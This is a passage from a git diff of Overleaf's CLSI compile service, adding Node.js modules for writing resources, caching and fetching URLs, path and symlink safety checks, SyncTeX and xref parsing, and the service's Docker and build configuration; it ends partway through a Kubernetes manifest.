+ })(resource) + ) + return async.parallelLimit(jobs, parallelFileDownloads, callback) + }) + }, + + saveAllResourcesToDisk(request, basePath, callback) { + if (callback == null) { + callback = function () {} + } + return ResourceWriter._createDirectory(basePath, error => { + if (error != null) { + return callback(error) + } + const { project_id: projectId, resources } = request + ResourceWriter._removeExtraneousFiles( + request, + resources, + basePath, + error => { + if (error != null) { + return callback(error) + } + const jobs = Array.from(resources).map(resource => + (resource => { + return callback => + 
ResourceWriter._writeResourceToDisk( + projectId, + resource, + basePath, + callback + ) + })(resource) + ) + return async.parallelLimit(jobs, parallelFileDownloads, callback) + } + ) + }) + }, + + _createDirectory(basePath, callback) { + if (callback == null) { + callback = function () {} + } + return fs.mkdir(basePath, function (err) { + if (err != null) { + if (err.code === 'EEXIST') { + return callback() + } else { + logger.debug({ err, dir: basePath }, 'error creating directory') + return callback(err) + } + } else { + return callback() + } + }) + }, + + _removeExtraneousFiles(request, resources, basePath, _callback) { + if (_callback == null) { + _callback = function () {} + } + const timer = new Metrics.Timer( + 'unlink-output-files', + 1, + request.metricsOpts + ) + const callback = function (error, ...result) { + timer.done() + return _callback(error, ...Array.from(result)) + } + + return OutputFileFinder.findOutputFiles( + resources, + basePath, + (error, outputFiles, allFiles) => { + if (error != null) { + return callback(error) + } + + const jobs = [] + for (const { path } of outputFiles || []) { + const shouldDelete = ResourceWriter.isExtraneousFile(path) + if (shouldDelete) { + jobs.push(callback => + ResourceWriter._deleteFileIfNotDirectory( + Path.join(basePath, path), + callback + ) + ) + } + } + + return async.series(jobs, function (error) { + if (error != null) { + return callback(error) + } + return callback(null, outputFiles, allFiles) + }) + } + ) + }, + + isExtraneousFile(path) { + let shouldDelete = true + if ( + path.match(/^output\./) || + path.match(/\.aux$/) || + path.match(/^cache\//) + ) { + // knitr cache + shouldDelete = false + } + if (path.match(/^output-.*/)) { + // Tikz cached figures (default case) + shouldDelete = false + } + if (path.match(/\.(pdf|dpth|md5)$/)) { + // Tikz cached figures (by extension) + shouldDelete = false + } + if ( + path.match(/\.(pygtex|pygstyle)$/) || + path.match(/(^|\/)_minted-[^\/]+\//) + ) { + // minted files/directory + shouldDelete = false + } + if (path.match(/\.md\.tex$/) || path.match(/(^|\/)_markdown_[^\/]+\//)) { + // markdown files/directory + shouldDelete = false + } + if (path.match(/-eps-converted-to\.pdf$/)) { + // Epstopdf generated files + shouldDelete = false + } + if ( + path === 'output.tar.gz' || + path === 'output.synctex.gz' || + path === 'output.pdfxref' || + path === 'output.pdf' || + path === 'output.dvi' || + path === 'output.log' || + path === 'output.xdv' || + path === 'output.stdout' || + path === 'output.stderr' + ) { + shouldDelete = true + } + if (path === 'output.tex') { + // created by TikzManager if present in output files + shouldDelete = true + } + return shouldDelete + }, + + _deleteFileIfNotDirectory(path, callback) { + if (callback == null) { + callback = function () {} + } + return fs.stat(path, function (error, stat) { + if (error != null && error.code === 'ENOENT') { + return callback() + } else if (error != null) { + logger.err( + { err: error, path }, + 'error stating file in deleteFileIfNotDirectory' + ) + return callback(error) + } else if (stat.isFile()) { + return fs.unlink(path, function (error) { + if (error != null) { + logger.err( + { err: error, path }, + 'error removing file in deleteFileIfNotDirectory' + ) + return callback(error) + } else { + return callback() + } + }) + } else { + return callback() + } + }) + }, + + _writeResourceToDisk(projectId, resource, basePath, callback) { + if (callback == null) { + callback = function () {} + } + return 
ResourceWriter.checkPath( + basePath, + resource.path, + function (error, path) { + if (error != null) { + return callback(error) + } + return fs.mkdir( + Path.dirname(path), + { recursive: true }, + function (error) { + if (error != null) { + return callback(error) + } + // TODO: Don't overwrite file if it hasn't been modified + if (resource.url != null) { + return UrlCache.downloadUrlToFile( + projectId, + resource.url, + resource.fallbackURL, + path, + resource.modified, + function (err) { + if (err != null) { + logger.err( + { + err, + projectId, + path, + resourceUrl: resource.url, + modified: resource.modified, + }, + 'error downloading file for resources' + ) + Metrics.inc('download-failed') + } + return callback() + } + ) // try and continue compiling even if http resource can not be downloaded at this time + } else { + fs.writeFile(path, resource.content, callback) + } + } + ) + } + ) + }, + + checkPath(basePath, resourcePath, callback) { + const path = Path.normalize(Path.join(basePath, resourcePath)) + if (path.slice(0, basePath.length + 1) !== basePath + '/') { + return callback(new Error('resource path is outside root directory')) + } else { + return callback(null, path) + } + }, +} + +module.exports.promises = { + syncResourcesToDisk: promisify(ResourceWriter.syncResourcesToDisk), + saveIncrementalResourcesToDisk: promisify( + ResourceWriter.saveIncrementalResourcesToDisk + ), + saveAllResourcesToDisk: promisify(ResourceWriter.saveAllResourcesToDisk), + checkPath: promisify(ResourceWriter.checkPath), +} diff --git a/services/clsi/app/js/SafeReader.js b/services/clsi/app/js/SafeReader.js new file mode 100644 index 0000000..8b1b5ab --- /dev/null +++ b/services/clsi/app/js/SafeReader.js @@ -0,0 +1,62 @@ +/* eslint-disable + no-unused-vars, + n/no-deprecated-api, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
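+//
+// SafeReader caps reads of untrusted files at a fixed byte limit (it is used
+// for the on-disk sync state and for the main .tex file scanned by
+// TikzManager), so an oversized file cannot exhaust memory.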
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let SafeReader +const fs = require('node:fs') +const logger = require('@overleaf/logger') + +module.exports = SafeReader = { + // safely read up to size bytes from a file and return result as a + // string + + readFile(file, size, encoding, callback) { + if (callback == null) { + callback = function () {} + } + return fs.open(file, 'r', function (err, fd) { + if (err != null && err.code === 'ENOENT') { + return callback() + } + if (err != null) { + return callback(err) + } + + // safely return always closing the file + const callbackWithClose = (err, ...result) => + fs.close(fd, function (err1) { + if (err != null) { + return callback(err) + } + if (err1 != null) { + return callback(err1) + } + return callback(null, ...Array.from(result)) + }) + const buff = Buffer.alloc(size) // fills with zeroes by default + return fs.read( + fd, + buff, + 0, + buff.length, + 0, + function (err, bytesRead, buffer) { + if (err != null) { + return callbackWithClose(err) + } + const result = buffer.toString(encoding, 0, bytesRead) + return callbackWithClose(null, result, bytesRead) + } + ) + }) + }, +} diff --git a/services/clsi/app/js/StaticServerForbidSymlinks.js b/services/clsi/app/js/StaticServerForbidSymlinks.js new file mode 100644 index 0000000..a5ec774 --- /dev/null +++ b/services/clsi/app/js/StaticServerForbidSymlinks.js @@ -0,0 +1,89 @@ +/* eslint-disable + no-cond-assign, + no-unused-vars, + n/no-deprecated-api, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
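+//
+// Wraps a static file server so that requests for compile output can only
+// serve real files under the output root: path traversal, unnormalised
+// paths and symlinked files all yield a 404 instead.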
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ForbidSymlinks +const Path = require('node:path') +const fs = require('node:fs') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') + +module.exports = ForbidSymlinks = function (staticFn, root, options) { + const expressStatic = staticFn(root, options) + const basePath = Path.resolve(root) + return function (req, res, next) { + let file, projectId, result + const path = req.url + // check that the path is of the form /project_id_or_name/path/to/file.log + if ((result = path.match(/^\/([a-zA-Z0-9_-]+)\/(.*)$/s))) { + projectId = result[1] + file = result[2] + if (path !== `/${projectId}/${file}`) { + logger.warn({ path }, 'unrecognized file request') + return res.sendStatus(404) + } + } else { + logger.warn({ path }, 'unrecognized file request') + return res.sendStatus(404) + } + // check that the file does not use a relative path + for (const dir of Array.from(file.split('/'))) { + if (dir === '..') { + logger.warn({ path }, 'attempt to use a relative path') + return res.sendStatus(404) + } + } + // check that the requested path is normalized + const requestedFsPath = `${basePath}/${projectId}/${file}` + if (requestedFsPath !== Path.normalize(requestedFsPath)) { + logger.error( + { path: requestedFsPath }, + 'requestedFsPath is not normalized' + ) + return res.sendStatus(404) + } + // check that the requested path is not a symlink + return fs.realpath(requestedFsPath, function (err, realFsPath) { + if (err != null) { + if (err.code === 'ENOENT') { + return res.sendStatus(404) + } else { + logger.error( + { + err, + requestedFsPath, + realFsPath, + path: req.params[0], + projectId: req.params.project_id, + }, + 'error checking file access' + ) + return res.sendStatus(500) + } + } else if (requestedFsPath !== realFsPath) { + logger.warn( + { + requestedFsPath, + realFsPath, + path: req.params[0], + projectId: req.params.project_id, + }, + 'trying to access a different file (symlink), aborting' + ) + return res.sendStatus(404) + } else { + return expressStatic(req, res, next) + } + }) + } +} diff --git a/services/clsi/app/js/SynctexOutputParser.js b/services/clsi/app/js/SynctexOutputParser.js new file mode 100644 index 0000000..5b2d237 --- /dev/null +++ b/services/clsi/app/js/SynctexOutputParser.js @@ -0,0 +1,113 @@ +const Path = require('node:path') + +/** + * Parse output from the `synctex view` command + */ +function parseViewOutput(output) { + return _parseOutput(output, (record, label, value) => { + switch (label) { + case 'Page': + _setIntProp(record, 'page', value) + break + case 'h': + _setFloatProp(record, 'h', value) + break + case 'v': + _setFloatProp(record, 'v', value) + break + case 'W': + _setFloatProp(record, 'width', value) + break + case 'H': + _setFloatProp(record, 'height', value) + break + } + }) +} + +/** + * Parse output from the `synctex edit` command + */ +function parseEditOutput(output, baseDir) { + return _parseOutput(output, (record, label, value) => { + switch (label) { + case 'Input': + if (Path.isAbsolute(value)) { + record.file = Path.relative(baseDir, value) + } else { + record.file = value + } + break + case 'Line': + _setIntProp(record, 'line', value) + break + case 'Column': + _setIntProp(record, 'column', 
value) + break + } + }) +} + +/** + * Generic parser for synctex output + * + * Parses the output into records. Each line is split into a label and a value, + * which are then sent to `processLine` for further processing. + */ +function _parseOutput(output, processLine) { + const lines = output.split('\n') + let currentRecord = null + const records = [] + for (const line of lines) { + const [label, value] = _splitLine(line) + + // A line that starts with 'Output:' indicates a new record + if (label === 'Output') { + // Start new record + currentRecord = {} + records.push(currentRecord) + continue + } + + // Ignore the line if we're not in a record yet + if (currentRecord == null) { + continue + } + + // Process the line + processLine(currentRecord, label, value) + } + return records +} + +/** + * Split a line in label and value components. + * + * The components are separated by a colon. Note that this is slightly + * different from `line.split(':', 2)`. This version puts the entirety of the + * line after the colon in the value component, even if there are more colons + * on the line. + */ +function _splitLine(line) { + const splitIndex = line.indexOf(':') + if (splitIndex === -1) { + return ['', line] + } + return [line.slice(0, splitIndex).trim(), line.slice(splitIndex + 1).trim()] +} + +function _setIntProp(record, prop, value) { + const intValue = parseInt(value, 10) + if (!isNaN(intValue)) { + record[prop] = intValue + } +} + +function _setFloatProp(record, prop, value) { + const floatValue = parseFloat(value) + if (!isNaN(floatValue)) { + record[prop] = floatValue + } +} + +module.exports = { parseViewOutput, parseEditOutput } diff --git a/services/clsi/app/js/TikzManager.js b/services/clsi/app/js/TikzManager.js new file mode 100644 index 0000000..ca9db6b --- /dev/null +++ b/services/clsi/app/js/TikzManager.js @@ -0,0 +1,109 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let TikzManager +const fs = require('node:fs') +const Path = require('node:path') +const { promisify } = require('node:util') +const ResourceWriter = require('./ResourceWriter') +const SafeReader = require('./SafeReader') +const logger = require('@overleaf/logger') + +// for \tikzexternalize or pstool to work the main file needs to match the +// jobname. Since we set the -jobname to output, we have to create a +// copy of the main file as 'output.tex'. 
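+//
+// e.g. a project that loads \usepackage{tikz} and calls \tikzexternalize
+// re-compiles its own main file to build each figure; that only works when
+// the main file carries the jobname, hence the output.tex copy.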
+ +module.exports = TikzManager = { + checkMainFile(compileDir, mainFile, resources, callback) { + // if there's already an output.tex file, we don't want to touch it + if (callback == null) { + callback = function () {} + } + for (const resource of Array.from(resources)) { + if (resource.path === 'output.tex') { + logger.debug( + { compileDir, mainFile }, + 'output.tex already in resources' + ) + return callback(null, false) + } + } + // if there's no output.tex, see if we are using tikz/pgf or pstool in the main file + return ResourceWriter.checkPath( + compileDir, + mainFile, + function (error, path) { + if (error != null) { + return callback(error) + } + return SafeReader.readFile( + path, + 65536, + 'utf8', + function (error, content) { + if (error != null) { + return callback(error) + } + const usesTikzExternalize = + (content != null + ? content.indexOf('\\tikzexternalize') + : undefined) >= 0 + const usesPsTool = + (content != null ? content.indexOf('{pstool}') : undefined) >= 0 + logger.debug( + { compileDir, mainFile, usesTikzExternalize, usesPsTool }, + 'checked for packages needing main file as output.tex' + ) + const needsMainFile = usesTikzExternalize || usesPsTool + return callback(null, needsMainFile) + } + ) + } + ) + }, + + injectOutputFile(compileDir, mainFile, callback) { + if (callback == null) { + callback = function () {} + } + return ResourceWriter.checkPath( + compileDir, + mainFile, + function (error, path) { + if (error != null) { + return callback(error) + } + return fs.readFile(path, 'utf8', function (error, content) { + if (error != null) { + return callback(error) + } + logger.debug( + { compileDir, mainFile }, + 'copied file to output.tex as project uses packages which require it' + ) + // use wx flag to ensure that output file does not already exist + return fs.writeFile( + Path.join(compileDir, 'output.tex'), + content, + { flag: 'wx' }, + callback + ) + }) + } + ) + }, +} + +module.exports.promises = { + checkMainFile: promisify(TikzManager.checkMainFile), + injectOutputFile: promisify(TikzManager.injectOutputFile), +} diff --git a/services/clsi/app/js/UrlCache.js b/services/clsi/app/js/UrlCache.js new file mode 100644 index 0000000..36703e7 --- /dev/null +++ b/services/clsi/app/js/UrlCache.js @@ -0,0 +1,132 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const UrlFetcher = require('./UrlFetcher') +const Settings = require('@overleaf/settings') +const fs = require('node:fs') +const Path = require('node:path') +const { callbackify } = require('node:util') +const Metrics = require('./Metrics') + +const PENDING_DOWNLOADS = new Map() + +function getProjectDir(projectId) { + return Path.join(Settings.path.clsiCacheDir, projectId) +} + +function getCachePath(projectId, url, lastModified) { + // The url is a filestore URL. + // It is sufficient to look at the path and mtime for uniqueness. 
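+  // e.g. url "http://filestore/project/abc123/file/def456" with an mtime of
+  // 1000000000000 maps to the cache key
+  // "-project-abc123-file-def456-1000000000000" inside the project's cache
+  // directory (illustrative values).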
+ const mtime = (lastModified && lastModified.getTime()) || 0 + const key = new URL(url).pathname.replace(/\//g, '-') + '-' + mtime + return Path.join(getProjectDir(projectId), key) +} + +async function clearProject(projectId, options) { + const timer = new Metrics.Timer('url_cache', { + status: options?.reason || 'unknown', + path: 'delete', + }) + await fs.promises.rm(getProjectDir(projectId), { + force: true, + recursive: true, + }) + timer.done() +} + +async function createProjectDir(projectId) { + await fs.promises.mkdir(getProjectDir(projectId), { recursive: true }) +} + +async function downloadUrlToFile( + projectId, + url, + fallbackURL, + destPath, + lastModified +) { + const cachePath = getCachePath(projectId, url, lastModified) + try { + const timer = new Metrics.Timer('url_cache', { + status: 'cache-hit', + path: 'copy', + }) + try { + await fs.promises.copyFile(cachePath, destPath) + } catch (err) { + if (err.code === 'ENOENT' && fallbackURL) { + const fallbackPath = getCachePath(projectId, fallbackURL, lastModified) + await fs.promises.copyFile(fallbackPath, destPath) + } else { + throw err + } + } + // the metric is only updated if the file is present in the cache + timer.done() + return + } catch (e) { + if (e.code !== 'ENOENT') { + throw e + } + } + // time the download + { + const timer = new Metrics.Timer('url_cache', { + status: 'cache-miss', + path: 'download', + }) + try { + await download(url, fallbackURL, cachePath) + } finally { + timer.done() + } + } + // time the file copy + { + const timer = new Metrics.Timer('url_cache', { + status: 'cache-miss', + path: 'copy', + }) + await fs.promises.copyFile(cachePath, destPath) + timer.done() + } +} + +async function download(url, fallbackURL, cachePath) { + let pending = PENDING_DOWNLOADS.get(cachePath) + if (pending) { + return pending + } + + pending = UrlFetcher.promises.pipeUrlToFileWithRetry( + url, + fallbackURL, + cachePath + ) + PENDING_DOWNLOADS.set(cachePath, pending) + try { + await pending + } finally { + PENDING_DOWNLOADS.delete(cachePath) + } +} + +module.exports = { + clearProject: callbackify(clearProject), + createProjectDir: callbackify(createProjectDir), + downloadUrlToFile: callbackify(downloadUrlToFile), + promises: { + clearProject, + createProjectDir, + downloadUrlToFile, + }, +} diff --git a/services/clsi/app/js/UrlFetcher.js b/services/clsi/app/js/UrlFetcher.js new file mode 100644 index 0000000..2c44f3a --- /dev/null +++ b/services/clsi/app/js/UrlFetcher.js @@ -0,0 +1,122 @@ +const fs = require('node:fs') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const { + CustomHttpAgent, + CustomHttpsAgent, + fetchStream, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const { URL } = require('node:url') +const { pipeline } = require('node:stream/promises') +const Metrics = require('./Metrics') + +const MAX_CONNECT_TIME = 1000 +const httpAgent = new CustomHttpAgent({ connectTimeout: MAX_CONNECT_TIME }) +const httpsAgent = new CustomHttpsAgent({ connectTimeout: MAX_CONNECT_TIME }) + +async function pipeUrlToFileWithRetry(url, fallbackURL, filePath) { + let remainingAttempts = 3 + let lastErr + while (remainingAttempts-- > 0) { + const timer = new Metrics.Timer('url_fetcher', { + path: lastErr ? 
'retry' : 'fetch',
+    })
+    try {
+      await pipeUrlToFile(url, fallbackURL, filePath)
+      timer.done({ status: 'success' })
+      return
+    } catch (err) {
+      timer.done({ status: 'error' })
+      logger.warn(
+        { err, url, filePath, remainingAttempts },
+        'error downloading url'
+      )
+      lastErr = err
+    }
+  }
+  throw lastErr
+}
+
+async function pipeUrlToFile(url, fallbackURL, filePath) {
+  const u = new URL(url)
+  if (
+    Settings.filestoreDomainOveride &&
+    u.host !== Settings.apis.clsiPerf.host
+  ) {
+    url = `${Settings.filestoreDomainOveride}${u.pathname}${u.search}`
+  }
+  if (fallbackURL) {
+    const u2 = new URL(fallbackURL)
+    if (
+      Settings.filestoreDomainOveride &&
+      u2.host !== Settings.apis.clsiPerf.host
+    ) {
+      fallbackURL = `${Settings.filestoreDomainOveride}${u2.pathname}${u2.search}`
+    }
+  }
+
+  let stream
+  try {
+    stream = await fetchStream(url, {
+      signal: AbortSignal.timeout(60 * 1000),
+      // provide a function to get the agent for each request
+      // as there may be multiple requests with different protocols
+      // due to redirects.
+      agent: _url => (_url.protocol === 'https:' ? httpsAgent : httpAgent),
+    })
+  } catch (err) {
+    if (
+      fallbackURL &&
+      err instanceof RequestFailedError &&
+      err.response.status === 404
+    ) {
+      stream = await fetchStream(fallbackURL, {
+        signal: AbortSignal.timeout(60 * 1000),
+        // provide a function to get the agent for each request
+        // as there may be multiple requests with different protocols
+        // due to redirects.
+        agent: _url => (_url.protocol === 'https:' ? httpsAgent : httpAgent),
+      })
+      url = fallbackURL
+    } else {
+      throw err
+    }
+  }
+
+  const source = inferSource(url)
+  Metrics.inc('url_source', 1, { path: source })
+
+  const atomicWrite = filePath + '~'
+  try {
+    const output = fs.createWriteStream(atomicWrite)
+    await pipeline(stream, output)
+    await fs.promises.rename(atomicWrite, filePath)
+    Metrics.count('UrlFetcher.downloaded_bytes', output.bytesWritten, {
+      path: source,
+    })
+  } catch (err) {
+    try {
+      await fs.promises.unlink(atomicWrite)
+    } catch (e) {}
+    throw err
+  }
+}
+
+const BUCKET_REGEX = /\/bucket\/([^/]+)\/key\//
+
+function inferSource(url) {
+  if (url.includes(Settings.apis.clsiPerf.host)) {
+    return 'clsi-perf'
+  } else if (url.includes('/project/') && url.includes('/file/')) {
+    return 'user-files'
+  } else if (url.includes('/key/')) {
+    const match = url.match(BUCKET_REGEX)
+    if (match) return match[1]
+  }
+  return 'unknown'
+}
+
+module.exports.promises = {
+  pipeUrlToFileWithRetry,
+}
diff --git a/services/clsi/app/js/XrefParser.js b/services/clsi/app/js/XrefParser.js
new file mode 100644
index 0000000..5f2d154
--- /dev/null
+++ b/services/clsi/app/js/XrefParser.js
@@ -0,0 +1,67 @@
+const { NoXrefTableError } = require('./Errors')
+const fs = require('node:fs')
+const { O_RDONLY, O_NOFOLLOW } = fs.constants
+const MAX_XREF_FILE_SIZE = 1024 * 1024
+
+/** Parse qpdf --show-xref output to get a table of xref entries
+ *
+ * @param {string} filePath
+ * @param {number} pdfFileSize
+ * @returns {Promise<{xRefEntries: Array<{offset: number, uncompressed?: boolean}>}>}
+ */
+async function parseXrefTable(filePath, pdfFileSize) {
+  try {
+    // the xref table will be written to output.pdfxref when available
+    const xRefFilePath = filePath + 'xref'
+    // check the size of the file (as it is untrusted)
+    const stats = await fs.promises.stat(xRefFilePath)
+    if (!stats.isFile()) {
+      throw new NoXrefTableError('xref file invalid type')
+    }
+    if (stats.size === 0) {
+      throw new NoXrefTableError('xref file empty')
+    }
+    if (stats.size > MAX_XREF_FILE_SIZE) {
+      throw new NoXrefTableError('xref file too large')
+    }
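+    // Open with O_NOFOLLOW so that a symlink placed at the xref path cannot
+    // redirect the read to an arbitrary file.
+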
const content = await fs.promises.readFile(xRefFilePath, { + encoding: 'ascii', + flag: O_RDONLY | O_NOFOLLOW, + }) + // the qpdf xref table output looks like this: + // + // 3/0: uncompressed; offset = 194159 + // + // we only need the uncompressed objects + const matches = content.matchAll( + // put an upper limit of 10^10 on all the matched numbers for safety + // ignore the generation id in "id/gen" + // in a linearized pdf all objects must have generation number 0 + /^\d{1,9}\/\d{1,9}: uncompressed; offset = (\d{1,9})$/gm + ) + // include a zero-index object for backwards compatibility with + // our existing xref table parsing code + const xRefEntries = [{ offset: 0 }] + // extract all the xref table entries + for (const match of matches) { + const offset = parseInt(match[1], 10) + xRefEntries.push({ offset, uncompressed: true }) + } + if (xRefEntries.length === 1) { + throw new NoXrefTableError('xref file has no objects') + } + return { xRefEntries } + } catch (err) { + if (err instanceof NoXrefTableError) { + throw err + } else if (err.code) { + throw new NoXrefTableError(`xref file error ${err.code}`) + } else { + throw new NoXrefTableError('xref file parse error') + } + } +} + +module.exports = { + parseXrefTable, +} diff --git a/services/clsi/bin/.gitignore b/services/clsi/bin/.gitignore new file mode 100644 index 0000000..e69de29 diff --git a/services/clsi/bin/acceptance_test b/services/clsi/bin/acceptance_test new file mode 100644 index 0000000..fd2e513 --- /dev/null +++ b/services/clsi/bin/acceptance_test @@ -0,0 +1,4 @@ +#!/bin/bash +set -e; +MOCHA="node_modules/.bin/mocha --recursive --reporter spec --timeout 15000" +$MOCHA "$@" diff --git a/services/clsi/buildscript.txt b/services/clsi/buildscript.txt new file mode 100644 index 0000000..1834ac9 --- /dev/null +++ b/services/clsi/buildscript.txt @@ -0,0 +1,11 @@ +clsi +--data-dirs=cache,compiles,output +--dependencies= +--docker-repos=gcr.io/overleaf-ops,us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add=ENABLE_PDF_CACHING="true",PDF_CACHING_ENABLE_WORKER_POOL="true",ALLOWED_IMAGES=quay.io/sharelatex/texlive-full:2017.1,TEXLIVE_IMAGE=quay.io/sharelatex/texlive-full:2017.1,TEX_LIVE_IMAGE_NAME_OVERRIDE=gcr.io/overleaf-ops,TEXLIVE_IMAGE_USER="tex",DOCKER_RUNNER="true",COMPILES_HOST_DIR=$PWD/compiles,OUTPUT_HOST_DIR=$PWD/output +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=True +--script-version=4.7.0 +--use-large-ci-runner=True diff --git a/services/clsi/docker-compose.ci.yml b/services/clsi/docker-compose.ci.yml new file mode 100644 index 0000000..1754a3a --- /dev/null +++ b/services/clsi/docker-compose.ci.yml @@ -0,0 +1,47 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . 
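+    # the acceptance tests drive real sibling containers through the docker
+    # socket mounted below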
+ image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + ENABLE_PDF_CACHING: "true" + PDF_CACHING_ENABLE_WORKER_POOL: "true" + ALLOWED_IMAGES: quay.io/sharelatex/texlive-full:2017.1 + TEXLIVE_IMAGE: quay.io/sharelatex/texlive-full:2017.1 + TEX_LIVE_IMAGE_NAME_OVERRIDE: gcr.io/overleaf-ops + TEXLIVE_IMAGE_USER: "tex" + DOCKER_RUNNER: "true" + COMPILES_HOST_DIR: $PWD/compiles + OUTPUT_HOST_DIR: $PWD/output + volumes: + - ./compiles:/overleaf/services/clsi/compiles + - /var/run/docker.sock:/var/run/docker.sock + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root diff --git a/services/clsi/docker-compose.yml b/services/clsi/docker-compose.yml new file mode 100644 index 0000000..3e70c25 --- /dev/null +++ b/services/clsi/docker-compose.yml @@ -0,0 +1,54 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + build: + context: ../.. + dockerfile: services/clsi/Dockerfile + target: base + volumes: + - .:/overleaf/services/clsi + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/clsi + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + + test_acceptance: + build: + context: ../.. 
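+      # build from the monorepo root so shared libraries/ and node_modules/
+      # are inside the build context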
+      dockerfile: services/clsi/Dockerfile
+      target: base
+    volumes:
+      - .:/overleaf/services/clsi
+      - ../../node_modules:/overleaf/node_modules
+      - ../../libraries:/overleaf/libraries
+      - /var/run/docker.sock:/var/run/docker.sock
+    working_dir: /overleaf/services/clsi
+    environment:
+      ELASTIC_SEARCH_DSN: es:9200
+      MONGO_HOST: mongo
+      POSTGRES_HOST: postgres
+      MOCHA_GREP: ${MOCHA_GREP}
+      LOG_LEVEL: ${LOG_LEVEL:-}
+      NODE_ENV: test
+      NODE_OPTIONS: "--unhandled-rejections=strict"
+      ENABLE_PDF_CACHING: "true"
+      PDF_CACHING_ENABLE_WORKER_POOL: "true"
+      ALLOWED_IMAGES: quay.io/sharelatex/texlive-full:2017.1
+      TEXLIVE_IMAGE: quay.io/sharelatex/texlive-full:2017.1
+      TEX_LIVE_IMAGE_NAME_OVERRIDE: gcr.io/overleaf-ops
+      TEXLIVE_IMAGE_USER: "tex"
+      DOCKER_RUNNER: "true"
+      COMPILES_HOST_DIR: $PWD/compiles
+      OUTPUT_HOST_DIR: $PWD/output
+    command: npm run --silent test:acceptance
+
diff --git a/services/clsi/entrypoint.sh b/services/clsi/entrypoint.sh
new file mode 100755
index 0000000..bb551c9
--- /dev/null
+++ b/services/clsi/entrypoint.sh
@@ -0,0 +1,14 @@
+#!/bin/sh
+
+# add the node user to the docker group on the host
+DOCKER_GROUP=$(stat -c '%g' /var/run/docker.sock)
+groupadd --non-unique --gid "${DOCKER_GROUP}" dockeronhost
+usermod -aG dockeronhost node
+
+# compatibility: initial volume setup
+mkdir -p /overleaf/services/clsi/cache && chown node:node /overleaf/services/clsi/cache
+mkdir -p /overleaf/services/clsi/compiles && chown node:node /overleaf/services/clsi/compiles
+mkdir -p /overleaf/services/clsi/db && chown node:node /overleaf/services/clsi/db
+mkdir -p /overleaf/services/clsi/output && chown node:node /overleaf/services/clsi/output
+
+exec runuser -u node -- "$@"
diff --git a/services/clsi/install_deps.sh b/services/clsi/install_deps.sh
new file mode 100755
index 0000000..07711b2
--- /dev/null
+++ b/services/clsi/install_deps.sh
@@ -0,0 +1,24 @@
+#!/bin/bash
+set -ex
+
+apt-get update
+
+apt-get install -y \
+  poppler-utils \
+  ghostscript \
+
+rm -rf /var/lib/apt/lists/*
+
+# Allow ImageMagick to process PDF files. This is for tests only, but since we
+# use the production images for tests, this will apply to production as well.
+patch /etc/ImageMagick-6/policy.xml <<EOF
+@@ -88,8 +88,7 @@
+   <!-- disable ghostscript format types -->
+   <policy domain="coder" rights="none" pattern="PS" />
+   <policy domain="coder" rights="none" pattern="PS2" />
+   <policy domain="coder" rights="none" pattern="PS3" />
+-  <policy domain="coder" rights="none" pattern="PDF" />
+   <policy domain="coder" rights="none" pattern="XPS" />
+ </policymap>
+EOF
diff --git a/services/clsi/kube.yaml b/services/clsi/kube.yaml
new file mode 100644
index 0000000..d3fb042
--- /dev/null
+++ b/services/clsi/kube.yaml
@@ -0,0 +1,41 @@
+apiVersion: v1
+kind: Service
+metadata:
+  name: clsi
+  namespace: default
+spec:
+  type: LoadBalancer
+  ports:
+    - port: 80
+      protocol: TCP
+      targetPort: 80
+  selector:
+    run: clsi
+---
+apiVersion: extensions/v1beta1
+kind: Deployment
+metadata:
+  name: clsi
+  namespace: default
+spec:
+  replicas: 2
+  template:
+    metadata:
+      labels:
+        run: clsi
+    spec:
+      containers:
+        - name: clsi
